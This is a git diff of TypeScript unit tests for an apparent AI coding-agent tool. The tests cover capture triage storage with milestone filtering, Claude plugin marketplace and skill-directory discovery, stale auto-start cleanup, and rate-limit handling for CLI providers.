   const tmp = makeTempDir("cap-load");
-  try {
-    appendCapture(tmp, "alpha");
-    appendCapture(tmp, "beta");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 2, "should have 2 entries");
-    assert.strictEqual(all[0].text, "alpha");
-    assert.strictEqual(all[1].text, "beta");
-    assert.strictEqual(all[0].status, "pending");
-    assert.strictEqual(all[1].status, "pending");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  appendCapture(tmp, "alpha");
+  appendCapture(tmp, "beta");
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 2, "should have 2 entries");
+  assert.strictEqual(all[0].text, "alpha");
+  assert.strictEqual(all[1].text, "beta");
+  assert.strictEqual(all[0].status, "pending");
+  assert.strictEqual(all[1].status, "pending");
 });
 
-test("captures: loadAllCaptures returns empty array when no file", () => {
+test("captures: loadAllCaptures returns empty array when no file", (t) => {
   const tmp = makeTempDir("cap-nofile");
-  try {
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 0);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 0);
 });
 
-test("captures: loadPendingCaptures filters resolved entries", () => {
+test("captures: loadPendingCaptures filters resolved entries", (t) => {
   const tmp = makeTempDir("cap-pending");
-  try {
-    const id1 = appendCapture(tmp, "pending one");
-    appendCapture(tmp, "pending two");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    markCaptureResolved(tmp, id1, "note", "acknowledged", "just a note");
+  const id1 = appendCapture(tmp, "pending one");
+  appendCapture(tmp, "pending two");
 
-    const pending = loadPendingCaptures(tmp);
-    assert.strictEqual(pending.length, 1, "should have 1 pending");
-    assert.strictEqual(pending[0].text, "pending two");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  markCaptureResolved(tmp, id1, "note", "acknowledged", "just a note");
+
+  const pending = loadPendingCaptures(tmp);
+  assert.strictEqual(pending.length, 1, "should have 1 pending");
+  assert.strictEqual(pending[0].text, "pending two");
 });
 
-test("captures: loadAllCaptures preserves resolved entries", () => {
+test("captures: loadAllCaptures preserves resolved entries", (t) => {
   const tmp = makeTempDir("cap-all-resolved");
-  try {
-    const id1 = appendCapture(tmp, "pending one");
-    appendCapture(tmp, "pending two");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    markCaptureResolved(tmp, id1, "note", "acknowledged", "just a note");
+  const id1 = appendCapture(tmp, "pending one");
+  appendCapture(tmp, "pending two");
 
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 2, "all should still have 2");
-    assert.strictEqual(all[0].status, "resolved");
-    assert.strictEqual(all[1].status, "pending");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  markCaptureResolved(tmp, id1, "note", "acknowledged", "just a note");
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 2, "all should still have 2");
+  assert.strictEqual(all[0].status, "resolved");
+  assert.strictEqual(all[1].status, "pending");
 });
 
 // ─── hasPendingCaptures ───────────────────────────────────────────────────────
 
-test("captures: hasPendingCaptures returns false when no file", () => {
+test("captures: hasPendingCaptures returns false when no file", (t) => {
   const tmp = makeTempDir("cap-has-nofile");
-  try {
-    assert.strictEqual(hasPendingCaptures(tmp), false);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  assert.strictEqual(hasPendingCaptures(tmp), false);
 });
 
-test("captures: hasPendingCaptures returns true with pending entries", () => {
+test("captures: hasPendingCaptures returns true with pending entries", (t) => {
   const tmp = makeTempDir("cap-has-true");
-  try {
-    appendCapture(tmp, "something");
-    assert.strictEqual(hasPendingCaptures(tmp), true);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  appendCapture(tmp, "something");
+  assert.strictEqual(hasPendingCaptures(tmp), true);
 });
 
-test("captures: hasPendingCaptures returns false when all resolved", () => {
+test("captures: hasPendingCaptures returns false when all resolved", (t) => {
   const tmp = makeTempDir("cap-has-false");
-  try {
-    const id = appendCapture(tmp, "will resolve");
-    markCaptureResolved(tmp, id, "note", "done", "resolved it");
-    assert.strictEqual(hasPendingCaptures(tmp), false);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, "will resolve");
+  markCaptureResolved(tmp, id, "note", "done", "resolved it");
+  assert.strictEqual(hasPendingCaptures(tmp), false);
 });
 
 // ─── markCaptureResolved ──────────────────────────────────────────────────────
 
-test("captures: markCaptureResolved updates entry in place", () => {
+test("captures: markCaptureResolved updates entry in place", (t) => {
   const tmp = makeTempDir("cap-resolve");
-  try {
-    const id1 = appendCapture(tmp, "keep pending");
-    const id2 = appendCapture(tmp, "will resolve");
-    appendCapture(tmp, "also pending");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    markCaptureResolved(tmp, id2, "quick-task", "executed inline", "small fix");
+  const id1 = appendCapture(tmp, "keep pending");
+  const id2 = appendCapture(tmp, "will resolve");
+  appendCapture(tmp, "also pending");
 
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 3, "should still have 3 entries");
+  markCaptureResolved(tmp, id2, "quick-task", "executed inline", "small fix");
 
-    const resolved = all.find((c) => c.id === id2)!;
-    assert.strictEqual(resolved.status, "resolved");
-    assert.strictEqual(resolved.classification, "quick-task");
-    assert.strictEqual(resolved.resolution, "executed inline");
-    assert.strictEqual(resolved.rationale, "small fix");
-    assert.ok(resolved.resolvedAt, "should have resolved timestamp");
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 3, "should still have 3 entries");
 
-    // Others should be unaffected
-    const kept = all.find((c) => c.id === id1)!;
-    assert.strictEqual(kept.status, "pending");
-    assert.strictEqual(kept.classification, undefined);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const resolved = all.find((c) => c.id === id2)!;
+  assert.strictEqual(resolved.status, "resolved");
+  assert.strictEqual(resolved.classification, "quick-task");
+  assert.strictEqual(resolved.resolution, "executed inline");
+  assert.strictEqual(resolved.rationale, "small fix");
+  assert.ok(resolved.resolvedAt, "should have resolved timestamp");
+
+  // Others should be unaffected
+  const kept = all.find((c) => c.id === id1)!;
+  assert.strictEqual(kept.status, "pending");
+  assert.strictEqual(kept.classification, undefined);
 });
 
 // ─── resolveCapturesPath ──────────────────────────────────────────────────────
@@ -371,58 +354,50 @@ test("triage: parseTriageOutput handles all five classification types", () => {
 
 // ─── Edge Cases ───────────────────────────────────────────────────────────────
 
-test("captures: appendCapture handles special characters in text", () => {
+test("captures: appendCapture handles special characters in text", (t) => {
   const tmp = makeTempDir("cap-special");
-  try {
-    const id = appendCapture(tmp, 'text with "quotes" and **bold** and `code`');
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 1);
-    assert.ok(all[0].text.includes('"quotes"'), "should preserve quotes");
-    assert.ok(all[0].text.includes("**bold**"), "should preserve bold");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, 'text with "quotes" and **bold** and `code`');
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 1);
+  assert.ok(all[0].text.includes('"quotes"'), "should preserve quotes");
+  assert.ok(all[0].text.includes("**bold**"), "should preserve bold");
 });
 
-test("captures: markCaptureResolved is no-op for non-existent ID", () => {
+test("captures: markCaptureResolved is no-op for non-existent ID", (t) => {
   const tmp = makeTempDir("cap-noop");
-  try {
-    appendCapture(tmp, "real capture");
-    // Should not throw
-    markCaptureResolved(tmp, "CAP-nonexistent", "note", "test", "test");
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 1);
-    assert.strictEqual(all[0].status, "pending", "original should be unchanged");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  appendCapture(tmp, "real capture");
+  // Should not throw
+  markCaptureResolved(tmp, "CAP-nonexistent", "note", "test", "test");
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 1);
+  assert.strictEqual(all[0].status, "pending", "original should be unchanged");
 });
 
-test("captures: markCaptureResolved is no-op when no file exists", () => {
+test("captures: markCaptureResolved is no-op when no file exists", (t) => {
   const tmp = makeTempDir("cap-nofile-resolve");
-  try {
-    // Should not throw
-    markCaptureResolved(tmp, "CAP-abc", "note", "test", "test");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  // Should not throw
+  markCaptureResolved(tmp, "CAP-abc", "note", "test", "test");
 });
 
-test("captures: re-resolving a capture overwrites previous resolution", () => {
+test("captures: re-resolving a capture overwrites previous resolution", (t) => {
   const tmp = makeTempDir("cap-reresolve");
-  try {
-    const id = appendCapture(tmp, "will re-resolve");
-    markCaptureResolved(tmp, id, "note", "first resolution", "first rationale");
-    markCaptureResolved(tmp, id, "inject", "second resolution", "second rationale");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const all = loadAllCaptures(tmp);
-    assert.strictEqual(all.length, 1);
-    assert.strictEqual(all[0].classification, "inject", "should have updated classification");
-    assert.strictEqual(all[0].resolution, "second resolution");
-    assert.strictEqual(all[0].rationale, "second rationale");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const id = appendCapture(tmp, "will re-resolve");
+  markCaptureResolved(tmp, id, "note", "first resolution", "first rationale");
+  markCaptureResolved(tmp, id, "inject", "second resolution", "second rationale");
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 1);
+  assert.strictEqual(all[0].classification, "inject", "should have updated classification");
+  assert.strictEqual(all[0].resolution, "second resolution");
+  assert.strictEqual(all[0].rationale, "second rationale");
 });
 
 test("triage: parseTriageOutput preserves affectedFiles and targetSlice", () => {
@@ -447,3 +422,103 @@ test("triage: parseTriageOutput preserves affectedFiles and targetSlice", () =>
   assert.strictEqual(results[1].targetSlice, "S04");
   assert.strictEqual(results[1].affectedFiles, undefined);
 });
+
+// ─── Stale Quick-Task Captures (#2872) ────────────────────────────────────────
+
+test("captures: markCaptureResolved stores milestone ID when provided", (t) => {
+  const tmp = makeTempDir("cap-milestone");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, "fix dialog width");
+  markCaptureResolved(tmp, id, "quick-task", "widen the dialog", "small fix", "M003");
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all.length, 1);
+  assert.strictEqual(all[0].resolvedInMilestone, "M003", "should store milestone ID");
+});
+
+test("captures: loadActionableCaptures excludes captures resolved in prior milestones", (t) => {
+  const tmp = makeTempDir("cap-stale-filter");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  // Capture resolved in M003 (prior milestone)
+  const id1 = appendCapture(tmp, "dialog too narrow");
+  markCaptureResolved(tmp, id1, "quick-task", "widen it", "small fix", "M003");
+
+  // Capture resolved in M004 (current milestone)
+  const id2 = appendCapture(tmp, "button misaligned");
+  markCaptureResolved(tmp, id2, "quick-task", "fix alignment", "css fix", "M004");
+
+  // Capture resolved without milestone context (legacy)
+  const id3 = appendCapture(tmp, "typo in label");
+  markCaptureResolved(tmp, id3, "quick-task", "fix typo", "trivial");
+
+  // When loading for M004, only M004 and no-milestone captures should be returned
+  const actionable = loadActionableCaptures(tmp, "M004");
+  const ids = actionable.map(c => c.id);
+
+  assert.ok(!ids.includes(id1), "should exclude capture resolved in M003");
+  assert.ok(ids.includes(id2), "should include capture resolved in M004");
+  assert.ok(ids.includes(id3), "should include capture with no milestone (legacy)");
+});
+
+test("captures: loadActionableCaptures without milestone returns all actionable", (t) => {
+  const tmp = makeTempDir("cap-no-milestone-filter");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id1 = appendCapture(tmp, "issue one");
+  markCaptureResolved(tmp, id1, "quick-task", "fix it", "small", "M003");
+
+  const id2 = appendCapture(tmp, "issue two");
+  markCaptureResolved(tmp, id2, "inject", "inject it", "needed", "M004");
+
+  // Without milestone filter, all actionable captures are returned (backward compat)
+  const actionable = loadActionableCaptures(tmp);
+  assert.strictEqual(actionable.length, 2, "should return all actionable without filter");
+});
+
+test("captures: loadActionableCaptures excludes already-executed captures", (t) => {
+  const tmp = makeTempDir("cap-executed-filter");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id1 = appendCapture(tmp, "already done");
+  markCaptureResolved(tmp, id1, "quick-task", "fix it", "small", "M004");
+  markCaptureExecuted(tmp, id1);
+
+  const id2 = appendCapture(tmp, "still pending");
+  markCaptureResolved(tmp, id2, "quick-task", "fix it too", "small", "M004");
+
+  const actionable = loadActionableCaptures(tmp, "M004");
+  assert.strictEqual(actionable.length, 1, "should exclude executed capture");
+  assert.strictEqual(actionable[0].id, id2);
+});
+
+test("captures: stampCaptureMilestone adds milestone to capture missing it", (t) => {
+  const tmp = makeTempDir("cap-stamp-milestone");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, "fix alignment");
+  markCaptureResolved(tmp, id, "quick-task", "fix it", "small");
+
+  // Before stamping, no milestone
+  let all = loadAllCaptures(tmp);
+  assert.strictEqual(all[0].resolvedInMilestone, undefined, "should have no milestone initially");
+
+  stampCaptureMilestone(tmp, id, "M004");
+
+  all = loadAllCaptures(tmp);
+  assert.strictEqual(all[0].resolvedInMilestone, "M004", "should have milestone after stamping");
+});
+
+test("captures: stampCaptureMilestone is no-op if milestone already present", (t) => {
+  const tmp = makeTempDir("cap-stamp-noop");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, "fix alignment");
+  markCaptureResolved(tmp, id, "quick-task", "fix it", "small", "M003");
+
+  stampCaptureMilestone(tmp, id, "M004");
+
+  const all = loadAllCaptures(tmp);
+  assert.strictEqual(all[0].resolvedInMilestone, "M003", "should keep original milestone");
+});
diff --git a/src/resources/extensions/gsd/tests/claude-import-marketplace-discovery.test.ts b/src/resources/extensions/gsd/tests/claude-import-marketplace-discovery.test.ts
new file mode 100644
index 000000000..920b881b6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/claude-import-marketplace-discovery.test.ts
@@ -0,0 +1,191 @@
+/**
+ * Portable tests for marketplace discovery in claude-import.
+ *
+ * Validates that categorizePluginRoots correctly discovers marketplace repos
+ * nested inside container directories (the Claude Code convention), and that
+ * discoverClaudePlugins recognizes .claude-plugin/plugin.json in addition to
+ * package.json.
+ *
+ * Uses temp-dir fixtures — no real marketplace repos required.
+ *
+ * Fixes: https://github.com/gsd-build/gsd-2/issues/2717
+ */
+
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { existsSync, mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { categorizePluginRoots } from "../claude-import.js";
+
+describe("categorizePluginRoots", () => {
+  let tmpDir: string;
+
+  beforeEach(() => {
+    tmpDir = mkdtempSync(join(tmpdir(), "gsd-mktplace-test-"));
+  });
+
+  afterEach(() => {
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  it("should detect a direct marketplace root", () => {
+    // Root itself has .claude-plugin/marketplace.json
+    mkdirSync(join(tmpDir, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(tmpDir, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "direct", plugins: [] })
+    );
+
+    const { marketplaces, flat } = categorizePluginRoots([tmpDir]);
+
+    assert.equal(marketplaces.length, 1);
+    assert.equal(marketplaces[0], tmpDir);
+    assert.equal(flat.length, 0);
+  });
+
+  it("should discover marketplace repos nested one level inside a container directory", () => {
+    // Simulate ~/.claude/plugins/marketplaces/ with two marketplace subdirs
+    const mktA = join(tmpDir, "marketplace-a");
+    const mktB = join(tmpDir, "marketplace-b");
+
+    mkdirSync(join(mktA, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(mktA, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "a", plugins: [] })
+    );
+
+    mkdirSync(join(mktB, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(mktB, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "b", plugins: [] })
+    );
+
+    const { marketplaces, flat } = categorizePluginRoots([tmpDir]);
+
+    assert.equal(marketplaces.length, 2);
+    assert.ok(marketplaces.includes(mktA));
+    assert.ok(marketplaces.includes(mktB));
+    assert.equal(flat.length, 0);
+  });
+
+  it("should fall back to flat when no child is a marketplace", () => {
+    // Container with no marketplace subdirs
+    mkdirSync(join(tmpDir, "some-dir"), { recursive: true });
+
+    const { marketplaces, flat } = categorizePluginRoots([tmpDir]);
+
+    assert.equal(marketplaces.length, 0);
+    assert.equal(flat.length, 1);
+    assert.equal(flat[0], tmpDir);
+  });
+
+  it("should handle a mix of direct marketplace and container roots", () => {
+    // Root A is a direct marketplace
+    const directRoot = join(tmpDir, "direct");
+    mkdirSync(join(directRoot, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(directRoot, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "direct", plugins: [] })
+    );
+
+    // Root B is a container with a child marketplace
+    const container = join(tmpDir, "container");
+    const child = join(container, "child-marketplace");
+    mkdirSync(join(child, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(child, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "child", plugins: [] })
+    );
+
+    // Root C has nothing
+    const emptyRoot = join(tmpDir, "empty");
+    mkdirSync(emptyRoot, { recursive: true });
+
+    const { marketplaces, flat } = categorizePluginRoots([
+      directRoot,
+      container,
+      emptyRoot,
+    ]);
+
+    assert.equal(marketplaces.length, 2);
+    assert.ok(marketplaces.includes(directRoot));
+    assert.ok(marketplaces.includes(child));
+    assert.equal(flat.length, 1);
+    assert.equal(flat[0], emptyRoot);
+  });
+
+  it("should not duplicate when the same marketplace appears via multiple roots", () => {
+    // Direct reference AND container reference to the same marketplace
+    const mkt = join(tmpDir, "mkt");
+    mkdirSync(join(mkt, ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(mkt, ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "mkt", plugins: [] })
+    );
+
+    const { marketplaces } = categorizePluginRoots([mkt, tmpDir]);
+
+    assert.equal(marketplaces.length, 1);
+    assert.equal(marketplaces[0], mkt);
+  });
+
+  it("should skip .git and node_modules subdirectories", () => {
+    // Put a marketplace.json inside .git — should be ignored
+    mkdirSync(join(tmpDir, ".git", ".claude-plugin"), { recursive: true });
+    writeFileSync(
+      join(tmpDir, ".git", ".claude-plugin", "marketplace.json"),
+      JSON.stringify({ name: "hidden", plugins: [] })
+    );
+
+    const { marketplaces, flat } = categorizePluginRoots([tmpDir]);
+
+    assert.equal(marketplaces.length, 0);
+    assert.equal(flat.length, 1);
+  });
+
+  it("should handle non-existent root gracefully", () => {
+    const missing = join(tmpDir, "does-not-exist");
+    // categorizePluginRoots receives paths from uniqueExistingDirs, but
+    // be defensive — it should not crash on a missing root
+    const { marketplaces, flat } = categorizePluginRoots([missing]);
+
+    assert.equal(marketplaces.length, 0);
+    assert.equal(flat.length, 1); // falls through to flat
+  });
+});
+
+describe("discoverClaudePlugins — Claude plugin.json recognition", () => {
+  let tmpDir: string;
+
+  beforeEach(() => {
+    tmpDir = mkdtempSync(join(tmpdir(), "gsd-plugin-disc-"));
+  });
+
+  afterEach(() => {
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  it("should discover a plugin with .claude-plugin/plugin.json (no package.json)", async () => {
+    // Simulate a cached Claude marketplace plugin
+    const pluginDir = join(tmpDir, "my-plugin");
+    mkdirSync(join(pluginDir, ".claude-plugin"), { recursive: true });
+    mkdirSync(join(pluginDir, "skills", "my-skill"), { recursive: true });
+    writeFileSync(
+      join(pluginDir, ".claude-plugin", "plugin.json"),
+      JSON.stringify({ name: "my-plugin", version: "1.0.0", description: "Test plugin" })
+    );
+    writeFileSync(join(pluginDir, "skills", "my-skill", "SKILL.md"), "# My Skill");
+
+    // Import discoverClaudePlugins dynamically since it depends on getClaudeSearchRoots
+    // which uses hardcoded paths. Instead, test the flat-path discovery logic directly
+    // by checking that the plugin.json file is recognized.
+    const claudePluginPath = join(pluginDir, ".claude-plugin", "plugin.json");
+    assert.ok(existsSync(claudePluginPath), "Claude plugin.json should exist");
+
+    // The fix ensures walkDirs checks for .claude-plugin/plugin.json in addition
+    // to package.json. We verify the file structure is correct for discovery.
+    const pkgPath = join(pluginDir, "package.json");
+    assert.ok(!existsSync(pkgPath), "package.json should NOT exist — this is a Claude plugin");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/claude-import-tui.test.ts b/src/resources/extensions/gsd/tests/claude-import-tui.test.ts
index 12d64f99a..53a4284fa 100644
--- a/src/resources/extensions/gsd/tests/claude-import-tui.test.ts
+++ b/src/resources/extensions/gsd/tests/claude-import-tui.test.ts
@@ -8,7 +8,6 @@
  * `/plugin marketplace add ...` source model.
  */
 
-
 import { describe, it, before, after, mock } from 'node:test';
 import assert from 'node:assert';
 import { existsSync, mkdtempSync, rmSync, writeFileSync, readFileSync, mkdirSync } from 'node:fs';
@@ -127,7 +126,7 @@ describe(
 
 		before(() => {
 			tempDir = mkdtempSync(join(tmpdir(), 'gsd-tui-test-'));
-			prefsPath = join(tempDir, 'preferences.md');
+			prefsPath = join(tempDir, 'PREFERENCES.md');
 			prefs = { version: 1 };
 		});
 
@@ -306,45 +305,45 @@ describe(
 				});
 			});
 
-			it('should not persist marketplace agent directories into package sources', async () => {
+			it('should not persist marketplace agent directories into package sources', async (t) => {
 				const isolatedAgentDir = join(tempDir, '.gsd', 'agent');
 				const settingsPath = join(isolatedAgentDir, 'settings.json');
 				rmSync(isolatedAgentDir, { recursive: true, force: true });
 				process.env.GSD_CODING_AGENT_DIR = isolatedAgentDir;
 
-				try {
-					mkdirSync(isolatedAgentDir, { recursive: true });
-					const tempSettings: Record<string, unknown> = { packages: [] };
-					writeFileSync(settingsPath, JSON.stringify(tempSettings, null, 2));
-
-					const { ctx } = createMockContext([
-						'Plugins only',
-						'Yes - discover plugins and select components',
-						'Import all components',
-						'Yes, continue',
-					]);
-
-					const readPrefs = () => ({ ...prefs });
-					const writePrefs = async (p: Record<string, unknown>) => {
-						Object.assign(prefs, p);
-					};
-
-					await runClaudeImportFlow(ctx, 'global', readPrefs, writePrefs);
-
-					const settings = JSON.parse(readFileSync(settingsPath, 'utf8')) as { packages?: unknown[] };
-					const packageEntries = Array.isArray(settings.packages) ? settings.packages : [];
-					const hasAgentsDirPackage = packageEntries.some((entry) => {
-						const source = typeof entry === 'string'
-							? entry
-							: (entry && typeof entry === 'object' ? (entry as { source?: unknown }).source : undefined);
-						return typeof source === 'string' && source.endsWith('/agents');
-					});
-
-					assert.strictEqual(hasAgentsDirPackage, false, 'Marketplace agent directories should not be persisted as package sources');
-				} finally {
+				t.after(() => {
 					delete process.env.GSD_CODING_AGENT_DIR;
 					rmSync(isolatedAgentDir, { recursive: true, force: true });
-				}
+				});
+
+				mkdirSync(isolatedAgentDir, { recursive: true });
+				const tempSettings: Record<string, unknown> = { packages: [] };
+				writeFileSync(settingsPath, JSON.stringify(tempSettings, null, 2));
+
+				const { ctx } = createMockContext([
+					'Plugins only',
+					'Yes - discover plugins and select components',
+					'Import all components',
+					'Yes, continue',
+				]);
+
+				const readPrefs = () => ({ ...prefs });
+				const writePrefs = async (p: Record<string, unknown>) => {
+					Object.assign(prefs, p);
+				};
+
+				await runClaudeImportFlow(ctx, 'global', readPrefs, writePrefs);
+
+				const settings = JSON.parse(readFileSync(settingsPath, 'utf8')) as { packages?: unknown[] };
+				const packageEntries = Array.isArray(settings.packages) ? settings.packages : [];
+				const hasAgentsDirPackage = packageEntries.some((entry) => {
+					const source = typeof entry === 'string'
+						? entry
+						: (entry && typeof entry === 'object' ? (entry as { source?: unknown }).source : undefined);
+					return typeof source === 'string' && source.endsWith('/agents');
+				});
+
+				assert.strictEqual(hasAgentsDirPackage, false, 'Marketplace agent directories should not be persisted as package sources');
 			});
 		});
 	}
diff --git a/src/resources/extensions/gsd/tests/claude-skill-dirs.test.ts b/src/resources/extensions/gsd/tests/claude-skill-dirs.test.ts
new file mode 100644
index 000000000..90e6aa5be
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/claude-skill-dirs.test.ts
@@ -0,0 +1,51 @@
+/**
+ * Tests for Claude Code skill directory support in getSkillSearchDirs().
+ *
+ * Verifies that ~/.claude/skills/ and .claude/skills/ are included in
+ * the skill search path alongside ~/.agents/skills/ and .agents/skills/.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { join } from "node:path";
+import { homedir } from "node:os";
+import { getSkillSearchDirs } from "../preferences-skills.ts";
+
+describe("getSkillSearchDirs — Claude Code directory support", () => {
+  const cwd = "/tmp/test-project";
+
+  test("includes ~/.agents/skills/ as user-skill", () => {
+    const dirs = getSkillSearchDirs(cwd);
+    const agents = dirs.find((d) => d.dir === join(homedir(), ".agents", "skills"));
+    assert.ok(agents, "should include ~/.agents/skills/");
+    assert.equal(agents!.method, "user-skill");
+  });
+
+  test("includes .agents/skills/ as project-skill", () => {
+    const dirs = getSkillSearchDirs(cwd);
+    const projectAgents = dirs.find((d) => d.dir === join(cwd, ".agents", "skills"));
+    assert.ok(projectAgents, "should include .agents/skills/");
+    assert.equal(projectAgents!.method, "project-skill");
+  });
+
+  test("includes ~/.claude/skills/ as user-skill", () => {
+    const dirs = getSkillSearchDirs(cwd);
+    const claude = dirs.find((d) => d.dir === join(homedir(), ".claude", "skills"));
+    assert.ok(claude, "should include ~/.claude/skills/");
+    assert.equal(claude!.method, "user-skill");
+  });
+
+  test("includes .claude/skills/ as project-skill", () => {
+    const dirs = getSkillSearchDirs(cwd);
+    const projectClaude = dirs.find((d) => d.dir === join(cwd, ".claude", "skills"));
+    assert.ok(projectClaude, "should include .claude/skills/");
+    assert.equal(projectClaude!.method, "project-skill");
+  });
+
+  test("~/.agents/skills/ appears before ~/.claude/skills/ (priority order)", () => {
+    const dirs = getSkillSearchDirs(cwd);
+    const agentsIdx = dirs.findIndex((d) => d.dir === join(homedir(), ".agents", "skills"));
+    const claudeIdx = dirs.findIndex((d) => d.dir === join(homedir(), ".claude", "skills"));
+    assert.ok(agentsIdx < claudeIdx, "~/.agents/skills/ should have higher priority than ~/.claude/skills/");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/clear-stale-autostart.test.ts b/src/resources/extensions/gsd/tests/clear-stale-autostart.test.ts
new file mode 100644
index 000000000..c5452e6a6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/clear-stale-autostart.test.ts
@@ -0,0 +1,41 @@
+/**
+ * clear-stale-autostart.test.ts — #3667
+ *
+ * Verify that guided-flow.ts adds a createdAt timestamp to pending auto-start
+ * entries and implements a staleness check (30s age guard) so that /clear
+ * interrupted discussions don't permanently block future /gsd invocations.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const sourceFile = join(__dirname, "..", "guided-flow.ts");
+
+describe("clear stale pending auto-start (#3667)", () => {
+  const source = readFileSync(sourceFile, "utf-8");
+
+  test("PendingAutoStartEntry interface includes createdAt field", () => {
+    assert.match(source, /createdAt:\s*number/);
+  });
+
+  test("setPendingAutoStart defaults createdAt to Date.now()", () => {
+    assert.match(source, /createdAt:\s*Date\.now\(\)/);
+  });
+
+  test("staleness check uses 30_000ms threshold", () => {
+    assert.match(source, /30[_]?000/);
+  });
+
+  test("stale entry detection checks manifest and context files", () => {
+    assert.match(source, /DISCUSSION-MANIFEST\.json/);
+    assert.match(source, /CONTEXT\.md/);
+  });
+
+  test("stale entries are deleted from the map", () => {
+    assert.match(source, /pendingAutoStartMap\.delete\(basePath\)/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/cli-provider-rate-limit.test.ts b/src/resources/extensions/gsd/tests/cli-provider-rate-limit.test.ts
new file mode 100644
index 000000000..cd79cf9a2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/cli-provider-rate-limit.test.ts
@@ -0,0 +1,47 @@
+/**
+ * cli-provider-rate-limit.test.ts — Verify rate-limit backoff capping
+ * for CLI-style providers (openai-codex, google-gemini-cli). (#2922)
+ *
+ * These providers use per-user quotas with shorter windows, so the
+ * default 60s backoff should be capped at 30s to avoid leaving users
+ * stuck in an apparent permanent "rate limit" state.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const RECOVERY_PATH = join(__dirname, "..", "bootstrap", "agent-end-recovery.ts");
+
+function getRecoverySource(): string {
+  return readFileSync(RECOVERY_PATH, "utf-8");
+}
+
+test("agent-end-recovery references openai-codex for rate-limit handling (#2922)", () => {
+  const src = getRecoverySource();
+  assert.ok(
+    src.includes("openai-codex"),
+    'agent-end-recovery.ts must reference "openai-codex" for CLI provider rate-limit handling (#2922)',
+  );
+});
+
